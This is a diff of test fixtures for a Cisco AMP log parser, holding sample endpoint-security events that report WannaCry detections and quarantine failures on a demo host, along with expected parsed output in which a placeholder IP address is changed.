pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json index c0bf252bb53f..193e5474d913 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json @@ -3,7 +3,7 @@ "@timestamp": "2021-01-14T21:17:16.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -54,7 +54,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -66,7 +66,7 @@ "@timestamp": "2021-01-14T20:38:26.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -100,7 +100,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 1313, + "log.offset": 1318, "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", "related.hash": [ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" @@ -110,7 +110,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -122,7 +122,7 @@ "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -156,7 +156,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 2612, + "log.offset": 2622, "related.hash": [ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], @@ -165,7 +165,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -177,7 +177,7 @@ "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ 